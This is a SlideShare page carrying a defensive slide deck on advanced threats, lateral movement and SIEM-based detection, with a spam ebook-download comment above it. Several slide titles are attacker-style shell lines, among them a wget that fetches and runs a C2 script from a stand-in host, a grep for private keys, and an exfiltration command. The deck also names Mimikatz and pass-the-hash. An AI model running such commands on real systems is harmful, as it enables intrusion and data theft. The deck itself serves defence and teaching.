Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Advanced Threats and Lateral Movement Detection

913 Aufrufe

Veröffentlicht am

High level slides on attack and defense against 'advanced adversaries.' This is about as close to sales as I'll get, lol.

Veröffentlicht in: Technologie
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Antworten 
    Sind Sie sicher, dass Sie …  Ja  Nein
    Ihre Nachricht erscheint hier

Advanced Threats and Lateral Movement Detection

  1. 1. Advanced  Threats  &  Lateral  Movement  Detec5on   Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Sr.  Security  Research  Engineer   LogRhythm  Labs  
  2. 2. #  whoami   •  Greg  Foss   •  Sr.  Security  Researcher   •  LogRhythm  Labs  –  Threat  Intel  Team   •  Former  DOE  PenetraEon  Tester   •  Focus  =>  Honeypots,  Incident  Response,  and  Red  Team   •  OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH,  etc…   2  
  3. 3. #  ls  -­‐lha   IT  Security  Threats   Event  CorrelaEon   DetecEon   DEMO!   1   2   3   4   3  
  4. 4. 4  
  5. 5. #  man  [Advanced  Threats]   •  Advanced  Persistent  Threats   •  Organized  Cyber  Crime   •  Hack5vists   •  ‘Cyber  Terrorists’   •  Etc…   •  Able  to  develop  and  uElize  sophisEcated  techniques  in  pursuit  of  their  target  objecEve  from   reconnaissance  to  data  exfiltraEon.   •  Will  leverage  the  full  spectrum  of  aWack  vectors  –  social,  technical,  physical,  etc.   •  Highly  organized,  highly  moEvated,  highly  resourced.       •  Willing  to  invest  significant  Eme  and  resources  to  compromise.   5  
  6. 6. It’s  when,  not  if…   •  Mission  Oriented   •  Persistent  an  Driven   •  PaEent  and  Methodical   •  Focus  on  exponenEal  ROI   •  Emphasis  on  high  IP  value  targets   •  They  will  get  in…   6   Image:  hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg  
  7. 7. Iden5fy  a  ‘Hacker’   7  
  8. 8. Ok,  for  real…   •  *Simple…  Correlate  on  odd  network  /  host  ac5vity   •  Use  the  data  at  hand  to  acEvely  detect  anomalies   •  Understand  how  your  organizaEon  will  respond  to  a  breach  /   outage  /  squirrel  affecEng  any  of  the  three  InfoSec  pillars     •  Confiden5ality   •  Integrity   •  Availability   8  
  9. 9. Advanced  Threat  Tac5cs  and  Evasion   •  Threat  actors  of  all  types  move  slowly  and  quietly  over  Eme.   LimiEng  exposure  and  potenEal  for  discovery.   •  Trending  on  enterprise  data  over  Eme  helps  to  build  baselines   that  can  be  used  to  ac5vely  iden5fy  anomalies.   9  
  10. 10. IT  Security  Threats   10  
  11. 11. #  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     11  
  12. 12. #  last  &&  echo  ‘How  are  they  geYng  in??’   •  Phishing   •  91%  of  ‘advanced’  aWacks  began  with  a  phishing  email  or   similar  social  engineering  tacEcs.   •  hWp://www.infosecurity-­‐magazine.com/view/29562/91-­‐of-­‐apt-­‐aWacks-­‐ start-­‐with-­‐a-­‐spearphishing-­‐email/     •  2014  Metrics   •  Average  cost  per  breach  =>  $3.5  million   •  15%  Higher  than  the  previous  year   •  hWp://www.ponemon.org/blog/ponemon-­‐insEtute-­‐releases-­‐2014-­‐cost-­‐ of-­‐data-­‐breach-­‐global-­‐analysis     12  
  13. 13. #  history  |  more   •  It  only  takes  one…   13  
  14. 14. #  ./searchsploit  ‘client  side’  &&  echo  ‘new  exploits  daily!’   14  
  15. 15. #  cat  [cve-­‐2014-­‐6332]  >>  /var/www/pwn-­‐IE.html   15  
  16. 16. Event  Correla5on  &  Detec5on   16  
  17. 17. Defense  in  Depth   17  
  18. 18. Spear  Phishing   18  
  19. 19. Phishing  Aback  Log  Traces   19  
  20. 20. $  vim  next.sh   •  Maintain  Access…   20   Image:  hWp://www.netresec.com/images/back_door_open_300x200.png  
  21. 21. $  ./next.sh   •  Then?   •  *Nothing…   •  For  a  long  Eme…     •  *not  really*   •  They  have  aWained  a  foothold  and  are  now  your  newest  employees…   21  
  22. 22. $  su  -­‐  root   22  
  23. 23. #  wget  hbp://bad.stuff.net/c2.py  .  &&  ./c2.py   •  Once  infected,  the  beachhead  will  beacon  periodically   23  
  24. 24. Behavioral  Analy5cs   •  Beaconing  Ac5vity  –  Usually  iniEated  over  port  443  or  an  encrypted   tunnel  over  port  80.   •  Can  be  detected  with  a  Firewall  or  Web  Proxy   •  Capability  to  decrypt  SSL  traffic  is  a  huge  plus   •  Behavioral  analy5cs  can  be  uElized  to  differenEate  normal  browsing   acEvity  from  possible  evidence  of  an  infected  host.   •  Using  a  SIEM,  track  the  unique  websites  usually  visited,  and  the  overall   volume  of  normal  web  acEvity,  on  a  per  user  and  a  per  host  basis.   •  Watch  for  significant  changes  over  an  extended  period  of  Eme.   24  
  25. 25. Reconnaissance   •  Ping  sweeps,  service  discovery,  etc.  –  NO   •  Why  make  unnecessary  noise?   •  Instead  =>  access  network  shares,  web  apps,  and  services   •  Passively  gather  informaEon  using  available  resources…   25   Image:  hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png  
  26. 26. Lateral  Movement   •  Dump  Local  System  Hashes   •  Maybe  crack  them,  maybe  it’s  not  even  necessary…   •  Pass  the  Hash  (PtH)   •  Dump  plain  text  passwords   •  Mimikatz  -­‐-­‐  FTW!   •  Act  as  an  internal  employee  -­‐-­‐  use  legiEmate  means  to  access   resources.   26  
  27. 27. Uncovering  Internal  Reconnaissance  and  Pivo5ng   •  Security  OperaEons  Goal  =>  Reduce  MTTD  and  MTTR   •  MTTD  –  Mean  Time  to  Detect   •  MTTR  –  Mean  Time  to  Respond   •  Set  Traps  =>  Honeypot  /  Honey  Token  access   •  Overt  Clues  =>  ModificaEon  of  user  /  file  /  group  permissions  and   pivoEng  evidence   •  Subtle  Clues  =>  VPN  access  from  disparate  geographical  locaEons   •  Missed  Opportuni5es  =>  Once  inside,  they  are  now  an  ‘employee’…   27  
  28. 28. Lateral  Movement  Log  Traces   •  Microsos’s  granular  Event  IdenEficaEon  schema  (EVID)  in   conjuncEon  with  environment  informaEon  provides  analysts   with  plenty  of  informaEon  to  track  aWackers  once  they  have   breached  the  perimeter.   28  
  29. 29. Passive  Data  Extrac5on   •  Well  Poisoning  via  UNC  Paths   •  SMB  Replay   •  Help  Desk  Tickets   •  Responder  –  By  Spider  Labs   •  Keylogging   29  
  30. 30. Passive  Traffic  Analysis   •  Analyze  /  capture  anything   that  comes  across  the  wire.   •  ARP  poison  hosts  of  interest,   take  over  switches/routers,   etc.   30   Image:  hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/  
  31. 31. #  grep  –rhi  ‘private  key’  /*  &&  echo  “Iden5fy  Key  Resources”   •  Keys  /  CerEficates  /  Passwords     •  File  Shares  and  Databases   •  Intellectual  Property   •  Domain  Controllers  /  Exchange  /  etc.   •  Business  Leaders  –  CXO,  Director,  VP,  etc.     •  AdministraEve  Assistants   31   Image:  hWp://www.mobilemarkeEngwatch.com/wordpress/wp-­‐content/uploads/2011/07/Top-­‐Secret-­‐Tip-­‐To-­‐Pick-­‐SMS-­‐Keyword.jpeg  
  32. 32. #  wget  hbp://target/files.tgz  &&  echo  “Data  Exfiltra5on”   •  Target  data  idenEfied,  gathered,  and  moved  out  of  the  environment.   •  Data  is  normally  leaked  in  a  ‘hidden’  or  modified  format,  rarely  is  the   actual  document  extracted.   •  Emails  and  Employee  PII   •  Intellectual  Property   •  Trade  Secrets   32   Image:  hWp://www.csee.umbc.edu/wp-­‐content/uploads/2013/04/ex.jpg  
  33. 33. Data  Exfiltra5on  is  Open  Not  ‘Advanced’   33  
  34. 34. Catching  Data  Exfiltra5on   •  Granular  restric5ons  on  sensi5ve  files  and  directories  to  specific   groups  or  individuals,  alert  on  any  abnormal  file  access  /  read  /   write  /  etc.     •  DNS  exfiltra5on  or  someEmes  even  ICMP  Tunneling  in  high  security   environments     •  Non-­‐SSL  over  ports  443  /  8443,  encrypted  TCP  over  ports  80  /  8080   •  Abnormal  web  server  ac5vity,  newly  created  files,  etc.   34  
  35. 35. It  all  comes  down  to  Event  Correla5on   35  
  36. 36. DEMO   36   DEMO  
  37. 37. Closing  Thoughts…   •  Don’t  be  hard  on  the  outside,  sos  and  chewy  on  the  inside…   •  Implement  Layer  3  (network)  SegmentaEon  and  Least  User  Privilege   •  Understand  your  environment  and  log  data  so  that  you  can  accurately   correlate  physical  and  cyber  events   •  Implement  URL  filtering,  stateful  packet  inspecEon,  and  binary  analysis   •  AcEvely  alert  on  and  respond  at  the  earliest  signs  of  lateral  movement  and   reconnaissance  observed  within  your  environment   •  The  earlier  you  can  detect  aWackers  the  beWer…   37  
  38. 38. Thank  You!   38     QUESTIONS?     Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Senior  Security  Research  Engineer   Greg.Foss[at]logrhythm.com   @heinzarelli  

×